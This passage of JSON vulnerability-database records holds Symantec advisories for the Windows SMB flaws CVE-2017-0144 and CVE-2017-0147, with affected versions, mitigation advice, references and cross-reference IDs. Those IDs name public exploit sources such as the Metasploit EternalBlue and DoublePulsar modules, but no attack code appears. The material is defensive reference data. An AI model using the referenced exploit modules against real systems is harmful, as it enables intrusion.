Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T12:07:45", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T12:07:45", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "11dbe39c4d7f15175d2e87f6ef9d882eecc8739a45bf17a81ca27afb5db2d3db", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "91624b45ebf883841bfe8f7b6a15aa38", "key": "href"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "766e2dcc28b9a137fc31c493662a08bd", "key": "title"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96704", "id": "SMNTC-96704", "immutableFields": [], "lastseen": "2018-03-13T12:07:45", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", 
"https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 559}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T12:07:45"}, {"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. 
\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. 
Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:00", "value": 8.5}}, "hash": "3557392b8f122db1c89ffcab5845347347013783ed27c31c334463bd303fac8b", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96704", "id": "SMNTC-96704", "lastseen": "2017-03-15T15:17:00", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 202}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:00"}], "viewCount": 605, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456"]}, 
{"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "threatpost", "idList": ["THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F"]}, {"type": 
"huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft 
windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": 
"38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "91624b45ebf883841bfe8f7b6a15aa38"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "766e2dcc28b9a137fc31c493662a08bd"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96709", "hash": "a6850c00b9a16b70a17246d1a9dc542daa01313c182daaace5b1b9955d704e5c", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. 
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 4.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96709", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0147"], "lastseen": "2021-06-08T19:05:23", "history": [{"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2016 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", 
"operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "### Description\n\nMicrosoft Windows is prone to an 
information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of 
suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T06:25:12", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 